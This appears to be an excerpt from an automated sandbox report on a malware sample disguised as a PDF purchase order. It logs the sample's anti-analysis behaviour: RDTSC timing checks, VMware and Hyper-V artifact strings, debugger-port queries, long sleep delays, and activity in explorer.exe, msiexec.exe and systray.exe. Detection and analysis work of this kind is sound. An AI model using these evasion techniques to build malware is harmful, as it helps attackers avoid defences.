Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 2EC9904 second address: 2EC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 2EC9B6E second address: 2EC9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Memory allocated: 950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Memory allocated: 24F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Memory allocated: 44F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Memory allocated: 7100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Memory allocated: 8100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Memory allocated: 82A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Memory allocated: 92A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Memory allocated: 12E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Memory allocated: 2C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Memory allocated: 4C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Memory allocated: 7320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Memory allocated: 8320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Memory allocated: 7320000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Code function: 7_2_00409AA0 rdtsc

7_2_00409AA0

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6952	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2602	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 479	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9467	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 881	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 864	Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\msiexec.exe	API coverage: 1.7 %

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe TID: 7516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3344	Thread sleep count: 479 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3344	Thread sleep time: -958000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3344	Thread sleep count: 9467 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3344	Thread sleep time: -18934000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe TID: 8096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6408	Thread sleep count: 137 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6408	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6408	Thread sleep count: 9834 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6408	Thread sleep time: -19668000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000008.00000002.3845273913.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: explorer.exe, 00000008.00000000.1425235205.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000008.00000002.3845642332.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: explorer.exe, 00000008.00000000.1443445326.000000000C019000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.000,
Source: explorer.exe, 00000008.00000003.3082201534.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: EqtGqZpPskFq.exe, 0000000A.00000002.1496131414.0000000000DB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
Source: RFQ31072024_August order_pdf.exe, 00000000.00000002.1423140905.0000000000821000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.1443445326.000000000C019000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.1425235205.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: explorer.exe, 00000008.00000002.3845642332.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082201534.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000008.00000000.1434261414.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000008.00000002.3845273913.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000008.00000000.1425235205.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000008.00000002.3845642332.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.1425235205.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000003.3082201534.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Code function: 7_2_00409AA0 rdtsc

7_2_00409AA0

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Code function: 7_2_0040ACE0 LdrLoadDll,

7_2_0040ACE0

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F59F2 GetLastError,RegQueryValueExW,RegCloseKey,GlobalFree,RegCreateKeyExW,RegSetValueExW,lstrlenW,RegSetValueExW,RegCloseKey,memset,OutputDebugStringW,SetLastError,

11_2_003F59F2

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F8A55 Sleep,LoadLibraryW,GetProcAddress,

11_2_003F8A55

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6154 mov eax, dword ptr fs:[00000030h]	7_2_015D6154
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6154 mov eax, dword ptr fs:[00000030h]	7_2_015D6154
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CC156 mov eax, dword ptr fs:[00000030h]	7_2_015CC156
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01664144 mov eax, dword ptr fs:[00000030h]	7_2_01664144
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01664144 mov eax, dword ptr fs:[00000030h]	7_2_01664144
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01664144 mov ecx, dword ptr fs:[00000030h]	7_2_01664144
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01664144 mov eax, dword ptr fs:[00000030h]	7_2_01664144
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01664144 mov eax, dword ptr fs:[00000030h]	7_2_01664144
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01668158 mov eax, dword ptr fs:[00000030h]	7_2_01668158
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01600124 mov eax, dword ptr fs:[00000030h]	7_2_01600124
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov eax, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov ecx, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov eax, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov eax, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov ecx, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov eax, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov eax, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov ecx, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov eax, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167E10E mov ecx, dword ptr fs:[00000030h]	7_2_0167E10E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01690115 mov eax, dword ptr fs:[00000030h]	7_2_01690115
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167A118 mov ecx, dword ptr fs:[00000030h]	7_2_0167A118
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167A118 mov eax, dword ptr fs:[00000030h]	7_2_0167A118
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167A118 mov eax, dword ptr fs:[00000030h]	7_2_0167A118
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167A118 mov eax, dword ptr fs:[00000030h]	7_2_0167A118
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A61E5 mov eax, dword ptr fs:[00000030h]	7_2_016A61E5
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016001F8 mov eax, dword ptr fs:[00000030h]	7_2_016001F8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016961C3 mov eax, dword ptr fs:[00000030h]	7_2_016961C3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016961C3 mov eax, dword ptr fs:[00000030h]	7_2_016961C3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E1D0 mov eax, dword ptr fs:[00000030h]	7_2_0164E1D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E1D0 mov eax, dword ptr fs:[00000030h]	7_2_0164E1D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E1D0 mov ecx, dword ptr fs:[00000030h]	7_2_0164E1D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E1D0 mov eax, dword ptr fs:[00000030h]	7_2_0164E1D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E1D0 mov eax, dword ptr fs:[00000030h]	7_2_0164E1D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CA197 mov eax, dword ptr fs:[00000030h]	7_2_015CA197
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CA197 mov eax, dword ptr fs:[00000030h]	7_2_015CA197
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CA197 mov eax, dword ptr fs:[00000030h]	7_2_015CA197
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0168C188 mov eax, dword ptr fs:[00000030h]	7_2_0168C188
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0168C188 mov eax, dword ptr fs:[00000030h]	7_2_0168C188
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01610185 mov eax, dword ptr fs:[00000030h]	7_2_01610185
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01674180 mov eax, dword ptr fs:[00000030h]	7_2_01674180
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01674180 mov eax, dword ptr fs:[00000030h]	7_2_01674180
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165019F mov eax, dword ptr fs:[00000030h]	7_2_0165019F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165019F mov eax, dword ptr fs:[00000030h]	7_2_0165019F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165019F mov eax, dword ptr fs:[00000030h]	7_2_0165019F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165019F mov eax, dword ptr fs:[00000030h]	7_2_0165019F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D2050 mov eax, dword ptr fs:[00000030h]	7_2_015D2050
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FC073 mov eax, dword ptr fs:[00000030h]	7_2_015FC073
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01656050 mov eax, dword ptr fs:[00000030h]	7_2_01656050
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE016 mov eax, dword ptr fs:[00000030h]	7_2_015EE016
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE016 mov eax, dword ptr fs:[00000030h]	7_2_015EE016
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE016 mov eax, dword ptr fs:[00000030h]	7_2_015EE016
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE016 mov eax, dword ptr fs:[00000030h]	7_2_015EE016
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01666030 mov eax, dword ptr fs:[00000030h]	7_2_01666030
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01654000 mov ecx, dword ptr fs:[00000030h]	7_2_01654000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000 mov eax, dword ptr fs:[00000030h]	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000 mov eax, dword ptr fs:[00000030h]	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000 mov eax, dword ptr fs:[00000030h]	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000 mov eax, dword ptr fs:[00000030h]	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000 mov eax, dword ptr fs:[00000030h]	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000 mov eax, dword ptr fs:[00000030h]	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000 mov eax, dword ptr fs:[00000030h]	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01672000 mov eax, dword ptr fs:[00000030h]	7_2_01672000
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CA020 mov eax, dword ptr fs:[00000030h]	7_2_015CA020
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CC020 mov eax, dword ptr fs:[00000030h]	7_2_015CC020
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016560E0 mov eax, dword ptr fs:[00000030h]	7_2_016560E0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016120F0 mov ecx, dword ptr fs:[00000030h]	7_2_016120F0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CC0F0 mov eax, dword ptr fs:[00000030h]	7_2_015CC0F0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D80E9 mov eax, dword ptr fs:[00000030h]	7_2_015D80E9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016520DE mov eax, dword ptr fs:[00000030h]	7_2_016520DE
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CA0E3 mov ecx, dword ptr fs:[00000030h]	7_2_015CA0E3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016680A8 mov eax, dword ptr fs:[00000030h]	7_2_016680A8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016960B8 mov eax, dword ptr fs:[00000030h]	7_2_016960B8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016960B8 mov ecx, dword ptr fs:[00000030h]	7_2_016960B8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D208A mov eax, dword ptr fs:[00000030h]	7_2_015D208A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167437C mov eax, dword ptr fs:[00000030h]	7_2_0167437C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01652349 mov eax, dword ptr fs:[00000030h]	7_2_01652349
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01678350 mov ecx, dword ptr fs:[00000030h]	7_2_01678350
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165035C mov eax, dword ptr fs:[00000030h]	7_2_0165035C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165035C mov eax, dword ptr fs:[00000030h]	7_2_0165035C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165035C mov eax, dword ptr fs:[00000030h]	7_2_0165035C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165035C mov ecx, dword ptr fs:[00000030h]	7_2_0165035C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165035C mov eax, dword ptr fs:[00000030h]	7_2_0165035C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165035C mov eax, dword ptr fs:[00000030h]	7_2_0165035C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169A352 mov eax, dword ptr fs:[00000030h]	7_2_0169A352
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CC310 mov ecx, dword ptr fs:[00000030h]	7_2_015CC310
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F0310 mov ecx, dword ptr fs:[00000030h]	7_2_015F0310
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A30B mov eax, dword ptr fs:[00000030h]	7_2_0160A30B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A30B mov eax, dword ptr fs:[00000030h]	7_2_0160A30B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A30B mov eax, dword ptr fs:[00000030h]	7_2_0160A30B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA3C0 mov eax, dword ptr fs:[00000030h]	7_2_015DA3C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA3C0 mov eax, dword ptr fs:[00000030h]	7_2_015DA3C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA3C0 mov eax, dword ptr fs:[00000030h]	7_2_015DA3C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA3C0 mov eax, dword ptr fs:[00000030h]	7_2_015DA3C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA3C0 mov eax, dword ptr fs:[00000030h]	7_2_015DA3C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA3C0 mov eax, dword ptr fs:[00000030h]	7_2_015DA3C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D83C0 mov eax, dword ptr fs:[00000030h]	7_2_015D83C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D83C0 mov eax, dword ptr fs:[00000030h]	7_2_015D83C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D83C0 mov eax, dword ptr fs:[00000030h]	7_2_015D83C0
